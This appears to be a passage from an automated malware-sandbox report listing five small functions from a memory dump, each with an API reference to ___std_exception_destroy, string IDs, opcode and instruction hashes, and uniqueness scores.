                                                          Function 002843A2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002843B3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$oAA
                                                          • API String ID: 4194217158-3931014327
                                                          • Opcode ID: 98f9c4a797952a03a7b41633722fcf91ce0a7057e1d05a388fc8a61234fb5981
                                                          • Instruction ID: 04d9867597ce83ab135e9eb49d6ad54a996ec67c8e7aea931a8f743af059bd80
                                                          • Opcode Fuzzy Hash: 98f9c4a797952a03a7b41633722fcf91ce0a7057e1d05a388fc8a61234fb5981
                                                          • Instruction Fuzzy Hash: 4BB09B7484015A55CB64D6149484BDE66A45744304F9084E6651C92500F77999C45D18
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00283570, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00283581
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$=3A
                                                          • API String ID: 4194217158-2558485789
                                                          • Opcode ID: a729a9aff9d526ec102c644b1c1a55d444adc7275727bef8c7319791b2905dcc
                                                          • Instruction ID: 18bef8c70342949ee13afd1434d5e1552bd80cfa69fa755020b29fc38a2d0893
                                                          • Opcode Fuzzy Hash: a729a9aff9d526ec102c644b1c1a55d444adc7275727bef8c7319791b2905dcc
                                                          • Instruction Fuzzy Hash: 8FB09B748041DC46CB109A94998478966A45704304F50C4D7651CB2140DB3866C44F2C
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 002828A9, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 002828BA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: *q@$v&A
                                                          • API String ID: 4194217158-3540377896
                                                          • Opcode ID: ff01178d9d106fc3234c1955f7b2dfda0c4d78196cdbda1c764d43b441858154
                                                          • Instruction ID: e85bdd96edc7d56f851464746a51c8e9fed5275493499f73ff98057e84d481f9
                                                          • Opcode Fuzzy Hash: ff01178d9d106fc3234c1955f7b2dfda0c4d78196cdbda1c764d43b441858154
                                                          • Instruction Fuzzy Hash: CAB09B748007D8C9CB149A149C486C977646745315F40C4D66004E7340D77859D44D58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00283C55, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00283C66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: ":A$*q@
                                                          • API String ID: 4194217158-1598967937
                                                          • Opcode ID: 2b9a25fe96298fcc36a3979b4c90986c0565e204fc28984aab923088190b6f85
                                                          • Instruction ID: fe8386e13ee7717e1f01010a6a0e5c87f38ec4214285a2e5a66b93a9c9342e47
                                                          • Opcode Fuzzy Hash: 2b9a25fe96298fcc36a3979b4c90986c0565e204fc28984aab923088190b6f85
                                                          • Instruction Fuzzy Hash: ECB092B491129886DB20DB64D884F89A7B8AB08344F8085D7A44CE3240E738AAC44D28
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00294D56, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 7COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00294D67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: ___std_exception_destroy
                                                          • String ID: #KB$*q@
                                                          • API String ID: 4194217158-2129133441
                                                          • Opcode ID: 21c41b7773b512e5ba0cdc51ebf6e8c22b2054a7cabe89ba7355ccfd1b9b17ec
                                                          • Instruction ID: 681825c46d3d5c1409574632d69ee78868c0ad69c2ae52adb595b0427b69f027
                                                          • Opcode Fuzzy Hash: 21c41b7773b512e5ba0cdc51ebf6e8c22b2054a7cabe89ba7355ccfd1b9b17ec
                                                          • Instruction Fuzzy Hash: F3B09B7490439885CB11D6249444B497664AB45304F8094D7744496100DB78A5944D19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%